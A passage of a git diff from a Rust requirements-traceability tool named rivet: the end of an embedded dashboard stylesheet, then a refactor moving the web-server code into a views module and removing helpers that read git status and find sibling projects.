display:flex;align-items:center;gap:.75rem;transition:background var(--transition)} +details.ver-row>summary::-webkit-details-marker{display:none} +details.ver-row>summary:hover{background:rgba(58,134,255,.04)} +details.ver-row[open]>summary{background:rgba(58,134,255,.04);border-bottom-color:var(--accent)} 
+details.ver-row>.ver-detail{padding:1rem 1.5rem;background:rgba(0,0,0,.01);border-bottom:1px solid var(--border)} +.ver-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4} +details.ver-row[open] .ver-chevron{transform:rotate(90deg)} +.ver-steps{width:100%;border-collapse:collapse;font-size:.85rem;margin-top:.5rem} +.ver-steps th{text-align:left;font-weight:600;font-size:.72rem;text-transform:uppercase; + letter-spacing:.04em;color:var(--text-secondary);padding:.4rem .5rem;border-bottom:1px solid var(--border)} +.ver-steps td{padding:.4rem .5rem;border-bottom:1px solid rgba(0,0,0,.04);vertical-align:top} +.method-badge{display:inline-flex;padding:.15rem .5rem;border-radius:4px;font-size:.72rem;font-weight:600; + background:#e8f4fd;color:#0c5a82} + +/* ── Results ─────────────────────────────────────────────────── */ +.result-pass{color:#15713a}.result-fail{color:#c62828}.result-skip{color:#6e6e73} +.result-error{color:#e67e22}.result-blocked{color:#8b6914} +.result-dot{display:inline-block;width:8px;height:8px;border-radius:50%;margin-right:.35rem} +.result-dot-pass{background:#15713a}.result-dot-fail{background:#c62828} +.result-dot-skip{background:#c5c5cd}.result-dot-error{background:#e67e22}.result-dot-blocked{background:#b8860b} + +/* ── Diff ────────────────────────────────────────────────────── */ +.diff-added{background:rgba(21,113,58,.08)} +.diff-removed{background:rgba(198,40,40,.08)} +.diff-modified{background:rgba(184,134,11,.08)} +.diff-icon{display:inline-flex;align-items:center;justify-content:center;width:1.5rem;height:1.5rem; + border-radius:4px;font-size:.85rem;font-weight:700;flex-shrink:0;margin-right:.35rem} +.diff-icon-add{background:rgba(21,113,58,.12);color:#15713a} +.diff-icon-remove{background:rgba(198,40,40,.12);color:#c62828} +.diff-icon-modify{background:rgba(184,134,11,.12);color:#b8860b} +.diff-summary{display:flex;gap:1.25rem;padding:.75rem 1rem;border-radius:var(--radius-sm); + 
background:var(--surface);border:1px solid var(--border);margin-bottom:1.25rem;font-size:.9rem;font-weight:600} +.diff-summary-item{display:flex;align-items:center;gap:.35rem} +.diff-old{color:#c62828;text-decoration:line-through;font-size:.85rem} +.diff-new{color:#15713a;font-size:.85rem} +.diff-arrow{color:var(--text-secondary);margin:0 .25rem;font-size:.8rem} +details.diff-row>summary{cursor:pointer;list-style:none;padding:.6rem .875rem;border-bottom:1px solid var(--border); + display:flex;align-items:center;gap:.5rem;transition:background var(--transition)} +details.diff-row>summary::-webkit-details-marker{display:none} +details.diff-row>summary:hover{background:rgba(58,134,255,.04)} +details.diff-row[open]>summary{background:rgba(184,134,11,.06);border-bottom-color:var(--border)} +details.diff-row>.diff-detail{padding:.75rem 1.25rem;background:rgba(0,0,0,.01);border-bottom:1px solid var(--border);font-size:.88rem} +.diff-field{padding:.3rem 0;display:flex;align-items:baseline;gap:.5rem} +.diff-field-name{font-weight:600;font-size:.8rem;color:var(--text-secondary);min-width:100px; + text-transform:uppercase;letter-spacing:.03em} + +/* ── Detail actions ──────────────────────────────────────────── */ +.detail-actions{display:flex;gap:.75rem;align-items:center;margin-top:1rem} +.btn{display:inline-flex;align-items:center;gap:.4rem;padding:.45rem 1rem;border-radius:var(--radius-sm); + font-size:.85rem;font-weight:600;font-family:var(--font);text-decoration:none; + transition:all var(--transition);cursor:pointer;border:none} +.btn-primary{background:var(--accent);color:#fff;box-shadow:0 1px 2px rgba(0,0,0,.08)} +.btn-primary:hover{background:var(--accent-hover);transform:translateY(-1px);color:#fff;text-decoration:none} +.btn-secondary{background:transparent;color:var(--text-secondary);border:1px solid var(--border)} +.btn-secondary:hover{background:rgba(0,0,0,.03);color:var(--text);text-decoration:none} + +/* ── SVG Viewer (fullscreen / popout / resize) 
───────────────── */ +.svg-viewer{position:relative;border:1px solid var(--border);border-radius:6px;overflow:hidden; + resize:both;min-height:300px} +.svg-viewer-toolbar{position:absolute;top:8px;right:8px;z-index:20;display:flex;gap:4px} +.svg-viewer-toolbar button{background:rgba(0,0,0,0.6);color:#fff;border:1px solid rgba(255,255,255,0.2); + border-radius:4px;padding:4px 8px;cursor:pointer;font-size:16px;line-height:1; + transition:background var(--transition)} +.svg-viewer-toolbar button:hover{background:rgba(0,0,0,0.8)} +.svg-viewer.fullscreen{position:fixed;top:0;left:0;width:100vw;height:100vh;z-index:9999; + border-radius:0;background:var(--bg);resize:none} +.svg-viewer.fullscreen .svg-viewer-toolbar{top:16px;right:16px} +.svg-viewer .graph-container{border:none;border-radius:0} +.svg-viewer.fullscreen .graph-container{height:100vh;min-height:100vh} + +/* ── Graph ────────────────────────────────────────────────────── */ +.graph-container{border-radius:var(--radius);overflow:hidden;background:#fafbfc;cursor:grab; + height:calc(100vh - 280px);min-height:400px;position:relative;border:1px solid var(--border)} +.graph-container:active{cursor:grabbing} +.graph-container svg{display:block;width:100%;height:100%;position:absolute;top:0;left:0} +.graph-controls{position:absolute;top:.75rem;right:.75rem;display:flex;flex-direction:column;gap:.35rem;z-index:10} +.graph-controls button{width:34px;height:34px;border:1px solid var(--border);border-radius:var(--radius-sm); + background:var(--surface);font-size:1rem;cursor:pointer;display:flex;align-items:center; + justify-content:center;box-shadow:var(--shadow);color:var(--text); + transition:all var(--transition)} +.graph-controls button:hover{background:#f0f0f3;box-shadow:var(--shadow-md)} +.graph-controls button:focus-visible{outline:2px solid var(--accent);outline-offset:2px} +.graph-legend{display:flex;flex-wrap:wrap;gap:.75rem;padding:.75rem 0 .25rem;font-size:.82rem} 
+.graph-legend-item{display:flex;align-items:center;gap:.35rem;color:var(--text-secondary)} +.graph-legend-swatch{width:12px;height:12px;border-radius:3px;flex-shrink:0} + +/* ── Filter grid ──────────────────────────────────────────────── */ +.filter-grid{display:flex;flex-wrap:wrap;gap:.6rem;margin-bottom:.75rem} +.filter-grid label{font-size:.8rem;display:flex;align-items:center;gap:.3rem; + color:var(--text-secondary);cursor:pointer;padding:.2rem .45rem; + border-radius:4px;transition:background var(--transition); + text-transform:none;letter-spacing:0;font-weight:500} +.filter-grid label:hover{background:rgba(58,134,255,.06)} +.filter-grid input[type="checkbox"]{margin:0;accent-color:var(--accent);width:14px;height:14px; + cursor:pointer;border-radius:3px} + +/* ── Document styles ──────────────────────────────────────────── */ +.doc-body{line-height:1.8;font-size:.95rem} +.doc-body h1{font-size:1.4rem;font-weight:700;margin:2rem 0 .75rem;color:var(--text); + border-bottom:2px solid var(--border);padding-bottom:.5rem} +.doc-body h2{font-size:1.2rem;font-weight:600;margin:1.5rem 0 .5rem;color:var(--text)} +.doc-body h3{font-size:1.05rem;font-weight:600;margin:1.25rem 0 .4rem;color:var(--text-secondary)} +.doc-body p{margin:.5rem 0} +.doc-body ul{margin:.5rem 0 .5rem 1.5rem} +.doc-body li{margin:.2rem 0} +.doc-body img{border-radius:6px;margin:.75rem 0;box-shadow:0 2px 8px rgba(0,0,0,.1)} +.doc-body pre.mermaid{background:transparent;border:1px solid var(--border);border-radius:6px;padding:1rem;text-align:center} +.artifact-ref{display:inline-flex;align-items:center;padding:.15rem .5rem;border-radius:5px; + font-size:.8rem;font-weight:600;font-family:var(--mono);background:#edf2ff; + color:#3a63c7;cursor:pointer;text-decoration:none; + border:1px solid #d4def5;transition:all var(--transition)} +.artifact-ref:hover{background:#d4def5;text-decoration:none;transform:translateY(-1px);box-shadow:0 2px 4px rgba(0,0,0,.06)} 
+.artifact-ref.broken{background:#fde8e8;color:#c62828;border-color:#f4c7c3;cursor:default}
+.artifact-ref.broken:hover{transform:none;box-shadow:none}
+/* ── Artifact hover preview ────────────────────────────────── */
+.art-tooltip{position:absolute;z-index:1000;pointer-events:none;
+ background:var(--surface);border:1px solid var(--border);border-radius:var(--radius);
+/* NOTE(review): --shadow-lg is never defined in :root (only --shadow and
+   --shadow-md), so var(--shadow-lg) resolved to nothing and the tooltip
+   rendered shadowless; --shadow-md is the closest defined token. */
+ box-shadow:var(--shadow-md);padding:0;max-width:340px;min-width:220px;
+ opacity:0;transition:opacity 120ms ease-in}
+.art-tooltip.visible{opacity:1;pointer-events:auto}
+.art-preview{padding:.75rem .85rem;font-size:.82rem;line-height:1.45}
+.art-preview-header{display:flex;align-items:center;gap:.4rem;margin-bottom:.3rem}
+.art-preview-title{font-weight:600;font-size:.85rem;margin-bottom:.3rem;color:var(--text)}
+.art-preview-desc{color:var(--text-secondary);font-size:.78rem;line-height:1.4;margin-top:.3rem;
+ display:-webkit-box;-webkit-line-clamp:3;-webkit-box-orient:vertical;overflow:hidden}
+.art-preview-links{font-size:.72rem;color:var(--text-secondary);margin-top:.35rem;font-family:var(--mono)}
+.art-preview-tags{margin-top:.35rem;display:flex;flex-wrap:wrap;gap:.25rem}
+.art-preview-tag{font-size:.65rem;padding:.1rem .35rem;border-radius:3px;
+ background:rgba(58,134,255,.08);color:var(--accent);font-family:var(--mono)}
+.doc-glossary{font-size:.9rem}
+.doc-glossary dt{font-weight:600;color:var(--text)}
+.doc-glossary dd{margin:0 0 .5rem 1rem;color:var(--text-secondary)}
+.doc-toc{font-size:.88rem;background:var(--surface);border:1px solid var(--border);
+ border-radius:var(--radius);padding:1rem 1.25rem;margin-bottom:1.25rem;
+ box-shadow:var(--shadow)}
+.doc-toc strong{font-size:.75rem;text-transform:uppercase;letter-spacing:.05em;color:var(--text-secondary)}
+.doc-toc ul{list-style:none;margin:.5rem 0 0;padding:0}
+.doc-toc li{margin:.2rem 0;color:var(--text-secondary)}
+.doc-toc .toc-h2{padding-left:0}
+.doc-toc .toc-h3{padding-left:1.25rem}
+.doc-toc .toc-h4{padding-left:2.5rem}
+.doc-meta{display:flex;gap:.75rem;flex-wrap:wrap;align-items:center;margin-bottom:1.25rem} + +/* ── Source viewer ────────────────────────────────────────────── */ +.source-tree{font-family:var(--mono);font-size:.85rem;line-height:1.8} +.source-tree ul{list-style:none;margin:0;padding:0} +.source-tree li{margin:0} +.source-tree .tree-item{display:flex;align-items:center;gap:.4rem;padding:.2rem .5rem;border-radius:var(--radius-sm); + transition:background var(--transition);color:var(--text)} +.source-tree .tree-item:hover{background:rgba(58,134,255,.06);text-decoration:none} +.source-tree .tree-icon{display:inline-flex;width:1rem;height:1rem;align-items:center;justify-content:center;flex-shrink:0;opacity:.55} +.source-tree .indent{display:inline-block;width:1.25rem;flex-shrink:0} +.source-viewer{font-family:var(--mono);font-size:.82rem;line-height:1.7;overflow-x:auto; + background:#fafbfc;border:1px solid var(--border);border-radius:var(--radius);padding:0} +.source-viewer table{width:100%;border-collapse:collapse;margin:0} +.source-viewer table td{padding:0;border:none;vertical-align:top} +.source-viewer table tr:hover{background:rgba(58,134,255,.04)} +.source-line{display:table-row} +.source-line .line-no{display:table-cell;width:3.5rem;min-width:3.5rem;padding:.05rem .75rem .05rem .5rem; + text-align:right;color:#b0b0b8;user-select:none;border-right:1px solid var(--border);background:#f5f5f7} +.source-line .line-content{display:table-cell;padding:.05rem .75rem;white-space:pre;tab-size:4} +.source-line-highlight{background:rgba(58,134,255,.08) !important} +.source-line-highlight .line-no{background:rgba(58,134,255,.12);color:var(--accent);font-weight:600} +.source-line:target{background:rgba(255,210,50,.18) !important} +.source-line:target .line-no{background:rgba(255,210,50,.25);color:#9a6700;font-weight:700} +.source-line .line-no a{color:inherit;text-decoration:none} +.source-line .line-no a:hover{color:var(--accent);text-decoration:underline} +/* ── Syntax 
highlighting tokens ─────────────────────────────── */ +.hl-key{color:#0550ae}.hl-str{color:#0a3069}.hl-num{color:#0550ae} +.hl-bool{color:#cf222e;font-weight:600}.hl-null{color:#cf222e;font-style:italic} +.hl-comment{color:#6e7781;font-style:italic}.hl-tag{color:#6639ba} +.hl-anchor{color:#953800}.hl-type{color:#8250df}.hl-kw{color:#cf222e;font-weight:600} +.hl-fn{color:#8250df}.hl-macro{color:#0550ae;font-weight:600} +.hl-attr{color:#116329}.hl-punct{color:#6e7781} +.hl-sh-cmd{color:#0550ae;font-weight:600}.hl-sh-flag{color:#953800} +.hl-sh-pipe{color:#cf222e;font-weight:700} +.source-ref-link{color:var(--accent);text-decoration:none;font-family:var(--mono);font-size:.85em} +.source-ref-link:hover{text-decoration:underline} +.source-breadcrumb{display:flex;align-items:center;gap:.4rem;font-size:.85rem;color:var(--text-secondary); + margin-bottom:1rem;flex-wrap:wrap} +.source-breadcrumb a{color:var(--accent);font-weight:500} +.source-breadcrumb .sep{opacity:.35;margin:0 .1rem} +.source-meta{display:flex;gap:1.5rem;font-size:.8rem;color:var(--text-secondary);margin-bottom:1rem} +.source-meta .meta-item{display:flex;align-items:center;gap:.35rem} +.source-refs{margin-top:1.25rem} +.source-refs h3{font-size:.95rem;margin-bottom:.5rem} + +/* ── STPA tree ───────────────────────────────────────────────── */ +.stpa-tree{margin-top:1.25rem} +.stpa-level{padding-left:1.5rem;border-left:2px solid var(--border);margin-left:.5rem} +.stpa-node{display:flex;align-items:center;gap:.5rem;padding:.35rem 0;font-size:.9rem} +.stpa-node a{font-family:var(--mono);font-size:.82rem;font-weight:500} +.stpa-link-label{display:inline-block;padding:.1rem .4rem;border-radius:4px;font-size:.68rem; + font-family:var(--mono);background:rgba(58,134,255,.08);color:var(--accent);font-weight:500; + margin-right:.35rem;white-space:nowrap} +details.stpa-details>summary{cursor:pointer;list-style:none;padding:.4rem .5rem;border-radius:var(--radius-sm); + 
display:flex;align-items:center;gap:.5rem;transition:background var(--transition);font-size:.9rem} +details.stpa-details>summary::-webkit-details-marker{display:none} +details.stpa-details>summary:hover{background:rgba(58,134,255,.04)} +details.stpa-details>summary .stpa-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4;font-size:.7rem} +details.stpa-details[open]>summary .stpa-chevron{transform:rotate(90deg)} +.stpa-uca-table{width:100%;border-collapse:collapse;font-size:.88rem;margin-top:.75rem} +.stpa-uca-table th{font-weight:600;font-size:.72rem;text-transform:uppercase;letter-spacing:.04em; + color:var(--text-secondary);padding:.5rem .75rem;border-bottom:2px solid var(--border)} +.stpa-uca-table td{padding:.55rem .75rem;border-bottom:1px solid var(--border);vertical-align:top} +.stpa-uca-table tbody tr:hover{background:rgba(58,134,255,.04)} +.uca-type-badge{display:inline-flex;padding:.15rem .5rem;border-radius:4px;font-size:.72rem;font-weight:600;white-space:nowrap} +.uca-type-not-providing{background:#fee;color:#c62828} +.uca-type-providing{background:#fff3e0;color:#e65100} +.uca-type-too-early-too-late{background:#e8f4fd;color:#0c5a82} +.uca-type-stopped-too-soon{background:#f3e5f5;color:#6a1b9a} + +/* ── Traceability explorer ──────────────────────────────────────── */ +.trace-matrix{border-collapse:collapse;font-size:.8rem;margin-bottom:1.5rem;width:100%} +.trace-matrix th{font-weight:600;font-size:.7rem;text-transform:uppercase;letter-spacing:.04em; + color:var(--text-secondary);padding:.45rem .6rem;border-bottom:2px solid var(--border);white-space:nowrap} +.trace-matrix td{padding:.35rem .6rem;border-bottom:1px solid var(--border);text-align:center} +.trace-matrix td:first-child{text-align:left;font-family:var(--mono);font-size:.78rem;font-weight:500} +.trace-matrix tbody tr:hover{background:rgba(58,134,255,.04)} +.trace-cell{display:inline-flex;align-items:center;justify-content:center;width:28px;height:22px; + 
border-radius:4px;font-size:.75rem;font-weight:700;font-variant-numeric:tabular-nums} +.trace-cell-ok{background:rgba(21,113,58,.1);color:#15713a} +.trace-cell-gap{background:rgba(198,40,40,.1);color:#c62828} +.trace-tree{margin-top:1rem} +.trace-node{display:flex;align-items:center;gap:.5rem;padding:.4rem .6rem;border-radius:var(--radius-sm); + transition:background var(--transition);font-size:.88rem} +.trace-node:hover{background:rgba(58,134,255,.04)} +.trace-node a{font-family:var(--mono);font-size:.82rem;font-weight:500} +.trace-edge{display:inline-block;padding:.1rem .4rem;border-radius:4px;font-size:.68rem; + font-family:var(--mono);background:rgba(58,134,255,.08);color:var(--accent);font-weight:500; + margin-right:.35rem;white-space:nowrap} +.trace-level{padding-left:1.5rem;border-left:2px solid var(--border);margin-left:.5rem} +details.trace-details>summary{cursor:pointer;list-style:none;padding:.4rem .5rem;border-radius:var(--radius-sm); + display:flex;align-items:center;gap:.5rem;transition:background var(--transition);font-size:.88rem} +details.trace-details>summary::-webkit-details-marker{display:none} +details.trace-details>summary:hover{background:rgba(58,134,255,.04)} +details.trace-details>summary .trace-chevron{transition:transform var(--transition);display:inline-flex;opacity:.4;font-size:.7rem} +details.trace-details[open]>summary .trace-chevron{transform:rotate(90deg)} +.trace-history{margin:.35rem 0 .5rem 1.5rem;padding:.5rem .75rem;background:rgba(0,0,0,.015); + border-radius:var(--radius-sm);border:1px solid var(--border);font-size:.8rem} +.trace-history-title{font-size:.7rem;font-weight:600;text-transform:uppercase;letter-spacing:.04em; + color:var(--text-secondary);margin-bottom:.35rem} +.trace-history-item{display:flex;align-items:baseline;gap:.5rem;padding:.15rem 0;color:var(--text-secondary)} +.trace-history-item code{font-size:.75rem;color:var(--accent);font-weight:500} +.trace-history-item 
.hist-date{font-size:.72rem;color:var(--text-secondary);opacity:.7;min-width:70px} +.trace-history-item .hist-msg{font-size:.78rem;color:var(--text);white-space:nowrap;overflow:hidden;text-overflow:ellipsis} +.trace-status{display:inline-flex;padding:.12rem .4rem;border-radius:4px;font-size:.68rem;font-weight:600; + margin-left:.25rem} +.trace-status-approved{background:rgba(21,113,58,.1);color:#15713a} +.trace-status-draft{background:rgba(184,134,11,.1);color:#b8860b} + +/* ── Artifact embedding in docs ────────────────────────────────── */ +.artifact-embed{margin:.75rem 0;padding:.75rem 1rem;background:var(--card-bg);border:1px solid var(--border); + border-radius:var(--radius);border-left:3px solid var(--accent)} +.artifact-embed-header{display:flex;align-items:center;gap:.5rem;margin-bottom:.35rem} +.artifact-embed-header .artifact-ref{font-family:var(--mono);font-size:.85rem;font-weight:600} +.artifact-embed-title{font-weight:600;font-size:.92rem;color:var(--text)} +.artifact-embed-desc{font-size:.82rem;color:var(--text-secondary);margin-top:.25rem;line-height:1.5} + +/* ── Diagram in artifact detail ────────────────────────────────── */ +.artifact-diagram{margin:1rem 0} +.artifact-diagram .mermaid{background:var(--card-bg);padding:1rem;border-radius:var(--radius); + border:1px solid var(--border)} + +/* ── AADL SVG style overrides (match etch) ────────────────────── */ +.aadl-viewport svg text{font-family:system-ui,-apple-system,BlinkMacSystemFont,sans-serif !important; + font-size:12px !important} +.aadl-viewport svg rect,.aadl-viewport svg polygon{rx:6;ry:6} +.aadl-viewport svg .node rect{stroke-width:1.5px;filter:drop-shadow(0 1px 3px rgba(0,0,0,.1))} +.aadl-viewport svg .edge path,.aadl-viewport svg .edge line{stroke:#888 !important;stroke-width:1.2px} +.aadl-viewport svg .edge polygon{fill:#888 !important;stroke:#888 !important} + +/* ── Scrollbar (subtle) ───────────────────────────────────────── */ +::-webkit-scrollbar{width:6px;height:6px} 
+::-webkit-scrollbar-track{background:transparent} +::-webkit-scrollbar-thumb{background:#c5c5cd;border-radius:3px} +::-webkit-scrollbar-thumb:hover{background:#a0a0aa} + +/* ── Selection ────────────────────────────────────────────────── */ +::selection{background:rgba(58,134,255,.18)} + +/* ── Cmd+K search modal ──────────────────────────────────────── */ +.cmd-k-overlay{position:fixed;inset:0;background:rgba(0,0,0,.55);backdrop-filter:blur(4px); + z-index:10000;display:none;align-items:flex-start;justify-content:center;padding-top:min(20vh,160px)} +.cmd-k-overlay.open{display:flex} +.cmd-k-modal{background:var(--sidebar);border-radius:12px;width:100%;max-width:600px; + box-shadow:0 16px 70px rgba(0,0,0,.35);border:1px solid rgba(255,255,255,.08); + overflow:hidden;display:flex;flex-direction:column;max-height:min(70vh,520px)} +.cmd-k-input{width:100%;padding:.875rem 1rem .875rem 2.75rem;font-size:1rem;font-family:var(--font); + background:transparent;border:none;border-bottom:1px solid rgba(255,255,255,.08); + color:#fff;outline:none;caret-color:var(--accent)} +.cmd-k-input::placeholder{color:rgba(255,255,255,.35)} +.cmd-k-icon{position:absolute;left:1rem;top:.95rem;color:rgba(255,255,255,.35);pointer-events:none; + font-size:.95rem} +.cmd-k-head{position:relative} +.cmd-k-results{overflow-y:auto;padding:.5rem 0;flex:1} +.cmd-k-empty{padding:1.5rem 1rem;text-align:center;color:rgba(255,255,255,.35);font-size:.9rem} +.cmd-k-group{padding:0 .5rem} +.cmd-k-group-label{font-size:.7rem;font-weight:600;text-transform:uppercase;letter-spacing:.06em; + color:rgba(255,255,255,.3);padding:.5rem .625rem .25rem} +.cmd-k-item{display:flex;align-items:center;gap:.75rem;padding:.5rem .625rem;border-radius:var(--radius-sm); + cursor:pointer;color:var(--sidebar-text);font-size:.88rem;transition:background 80ms ease} +.cmd-k-item:hover,.cmd-k-item.active{background:rgba(255,255,255,.08);color:#fff} 
+.cmd-k-item-icon{width:1.5rem;height:1.5rem;border-radius:4px;display:flex;align-items:center; + justify-content:center;font-size:.7rem;flex-shrink:0;background:rgba(255,255,255,.06);color:rgba(255,255,255,.5)} +.cmd-k-item-body{flex:1;min-width:0} +.cmd-k-item-title{font-weight:500;white-space:nowrap;overflow:hidden;text-overflow:ellipsis} +.cmd-k-item-title mark{background:transparent;color:var(--accent);font-weight:700} +.cmd-k-item-meta{font-size:.75rem;color:rgba(255,255,255,.35);white-space:nowrap;overflow:hidden;text-overflow:ellipsis} +.cmd-k-item-meta mark{background:transparent;color:var(--accent);font-weight:600} +.cmd-k-item-field{font-size:.65rem;padding:.1rem .35rem;border-radius:3px; + background:rgba(255,255,255,.06);color:rgba(255,255,255,.4);white-space:nowrap;flex-shrink:0} +.cmd-k-kbd{display:inline-flex;align-items:center;gap:.2rem;font-size:.7rem;font-family:var(--mono); + padding:.15rem .4rem;border-radius:4px;background:rgba(255,255,255,.08);color:rgba(255,255,255,.4); + border:1px solid rgba(255,255,255,.06)} +.nav-search-hint{display:flex;align-items:center;justify-content:space-between;padding:.5rem .75rem; + margin-top:auto;border-top:1px solid rgba(255,255,255,.06);padding-top:1rem; + color:var(--sidebar-text);font-size:.82rem;cursor:pointer;border-radius:var(--radius-sm); + transition:all var(--transition)} +.nav-search-hint:hover{background:var(--sidebar-hover);color:var(--sidebar-active)} +.aadl-diagram{background:var(--card-bg);border:1px solid var(--border);border-radius:8px; + margin:1.5rem 0;overflow:hidden;position:relative} +.aadl-diagram .aadl-caption{display:flex;align-items:center;justify-content:space-between; + padding:.5rem 1rem;border-bottom:1px solid var(--border);background:var(--nav-bg); + font-size:.82rem;color:var(--text-secondary)} +.aadl-caption .aadl-title{font-weight:600;color:var(--text);font-family:var(--mono);font-size:.85rem} +.aadl-caption .aadl-badge{display:inline-block;padding:.1rem 
.5rem;border-radius:var(--radius-sm); + background:var(--primary);color:#fff;font-size:.72rem;font-weight:600;letter-spacing:.02em} +.aadl-controls{display:flex;gap:.25rem} +.aadl-controls button{background:var(--card-bg);border:1px solid var(--border);border-radius:var(--radius-sm); + width:1.7rem;height:1.7rem;cursor:pointer;font-size:.85rem;line-height:1;display:flex; + align-items:center;justify-content:center;color:var(--text-secondary);transition:all .15s} +.aadl-controls button:hover{background:var(--primary);color:#fff;border-color:var(--primary)} +.aadl-viewport{overflow:hidden;cursor:grab;min-height:300px;position:relative;background:var(--body-bg)} +.aadl-viewport.grabbing{cursor:grabbing} +.aadl-viewport svg{transform-origin:0 0;position:absolute;top:0;left:0} +.aadl-viewport svg .node rect,.aadl-viewport svg .node polygon,.aadl-viewport svg .node path,.aadl-viewport svg .node ellipse{filter:drop-shadow(0 1px 2px rgba(0,0,0,.08))} +.aadl-viewport svg .node text{font-family:system-ui,-apple-system,sans-serif} +.aadl-viewport svg .edge path{stroke-dasharray:none} +.aadl-loading{color:var(--text-secondary);font-style:italic;padding:2rem;text-align:center} +.aadl-error{color:var(--danger);font-style:italic;padding:1rem} +.aadl-analysis{border-top:1px solid var(--border);max-height:220px;overflow-y:auto;font-size:.78rem} +.aadl-analysis-header{display:flex;align-items:center;gap:.5rem;padding:.4rem 1rem; + background:var(--nav-bg);font-weight:600;font-size:.75rem;color:var(--text-secondary); + position:sticky;top:0;z-index:1;border-bottom:1px solid var(--border)} +.aadl-analysis-header .badge-count{display:inline-flex;align-items:center;justify-content:center; + min-width:1.3rem;height:1.3rem;border-radius:99px;font-size:.65rem;font-weight:700;padding:0 .3rem} +.badge-error{background:var(--danger);color:#fff} +.badge-warning{background:#e8a735;color:#fff} +.badge-info{background:var(--primary);color:#fff} 
+.aadl-diag{display:flex;align-items:baseline;gap:.5rem;padding:.3rem 1rem;border-bottom:1px solid var(--border)} +.aadl-diag:last-child{border-bottom:none} +.aadl-diag:hover{background:rgba(0,0,0,.03)} +.aadl-diag .sev{flex-shrink:0;font-size:.65rem;font-weight:700;text-transform:uppercase; + padding:.1rem .35rem;border-radius:var(--radius-sm);letter-spacing:.03em} +.sev-error{background:#fde8e8;color:var(--danger)} +.sev-warning{background:#fef3cd;color:#856404} +.sev-info{background:#d1ecf1;color:#0c5460} +.aadl-diag .diag-path{color:var(--text-secondary);font-family:var(--mono);font-size:.72rem;flex-shrink:0} +.aadl-diag .diag-msg{color:var(--text);flex:1} +.aadl-diag .diag-analysis{color:var(--text-secondary);font-size:.68rem;opacity:.7;flex-shrink:0} +"#; diff --git a/rivet-cli/src/serve.rs b/rivet-cli/src/serve/views.rs similarity index 57% rename from rivet-cli/src/serve.rs rename to rivet-cli/src/serve/views.rs index 27a9ff7..d5f7462 100644 --- a/rivet-cli/src/serve.rs +++ b/rivet-cli/src/serve/views.rs @@ -1,2508 +1,42 @@ use std::collections::{BTreeMap, HashMap}; -use std::path::PathBuf; -use std::sync::Arc; -use anyhow::{Context as _, Result}; -use axum::Router; use axum::extract::{Path, Query, State}; -use axum::response::{Html, IntoResponse}; -use axum::routing::{get, post}; +use axum::response::Html; use petgraph::graph::{Graph, NodeIndex}; use petgraph::visit::EdgeRef; -use tokio::sync::RwLock; - -/// Embedded WASM/JS assets for single-binary distribution. -/// Only available when built with `--features embed-wasm` and assets exist. 
-#[cfg(feature = "embed-wasm")] -mod embedded_wasm { - pub const SPAR_JS: &str = include_str!("../assets/wasm/js/spar_wasm.js"); - pub const CORE_WASM: &[u8] = include_bytes!("../assets/wasm/js/spar_wasm.core.wasm"); - pub const CORE2_WASM: &[u8] = include_bytes!("../assets/wasm/js/spar_wasm.core2.wasm"); - pub const CORE3_WASM: &[u8] = include_bytes!("../assets/wasm/js/spar_wasm.core3.wasm"); -} - -use crate::{docs, schema_cmd}; -use etch::filter::ego_subgraph; -use etch::layout::{self as pgv_layout, EdgeInfo, LayoutOptions, NodeInfo}; -use etch::svg::{SvgOptions, render_svg}; -use rivet_core::adapter::{Adapter, AdapterConfig, AdapterSource}; -use rivet_core::coverage; -use rivet_core::diff::ArtifactDiff; -use rivet_core::document::{self, DocumentStore}; -use rivet_core::formats::generic::GenericYamlAdapter; -use rivet_core::links::LinkGraph; -use rivet_core::matrix::{self, Direction}; -use rivet_core::model::ProjectConfig; -use rivet_core::results::ResultStore; -use rivet_core::schema::{Schema, Severity}; -use rivet_core::store::Store; -use rivet_core::validate; - -// ── Repository context ────────────────────────────────────────────────── - -/// Git repository status captured at load time. -struct GitInfo { - branch: String, - commit_short: String, - is_dirty: bool, - dirty_count: usize, -} - -/// A discovered sibling project (example or peer). -struct SiblingProject { - name: String, - rel_path: String, -} - -/// Project context shown in the dashboard header. 
-struct RepoContext { - project_name: String, - project_path: String, - git: Option, - loaded_at: String, - siblings: Vec, - port: u16, -} - -fn capture_git_info(project_path: &std::path::Path) -> Option { - let branch = std::process::Command::new("git") - .args(["rev-parse", "--abbrev-ref", "HEAD"]) - .current_dir(project_path) - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string())?; - - let commit_short = std::process::Command::new("git") - .args(["rev-parse", "--short", "HEAD"]) - .current_dir(project_path) - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) - .unwrap_or_default(); - - let porcelain = std::process::Command::new("git") - .args(["status", "--porcelain"]) - .current_dir(project_path) - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).to_string()) - .unwrap_or_default(); - - let dirty_count = porcelain.lines().filter(|l| !l.is_empty()).count(); - - Some(GitInfo { - branch, - commit_short, - is_dirty: dirty_count > 0, - dirty_count, - }) -} - -/// Discover other rivet projects (examples/ and peer directories). 
-fn discover_siblings(project_path: &std::path::Path) -> Vec { - let mut siblings = Vec::new(); - - // Check examples/ subdirectory - let examples_dir = project_path.join("examples"); - if examples_dir.is_dir() { - if let Ok(entries) = std::fs::read_dir(&examples_dir) { - for entry in entries.flatten() { - let p = entry.path(); - if p.join("rivet.yaml").exists() { - if let Some(name) = p.file_name().and_then(|n| n.to_str()) { - siblings.push(SiblingProject { - name: name.to_string(), - rel_path: format!("examples/{name}"), - }); - } - } - } - } - } - - // If inside examples/, offer root project and peers - if let Some(parent) = project_path.parent() { - if parent.file_name().and_then(|n| n.to_str()) == Some("examples") { - if let Some(root) = parent.parent() { - if root.join("rivet.yaml").exists() { - if let Ok(cfg) = std::fs::read_to_string(root.join("rivet.yaml")) { - let root_name = cfg - .lines() - .find(|l| l.trim().starts_with("name:")) - .map(|l| l.trim().trim_start_matches("name:").trim().to_string()) - .unwrap_or_else(|| { - root.file_name() - .and_then(|n| n.to_str()) - .unwrap_or("root") - .to_string() - }); - siblings.push(SiblingProject { - name: root_name, - rel_path: root.display().to_string(), - }); - } - } - // Peer examples - if let Ok(entries) = std::fs::read_dir(parent) { - for entry in entries.flatten() { - let p = entry.path(); - if p != project_path && p.join("rivet.yaml").exists() { - if let Some(name) = 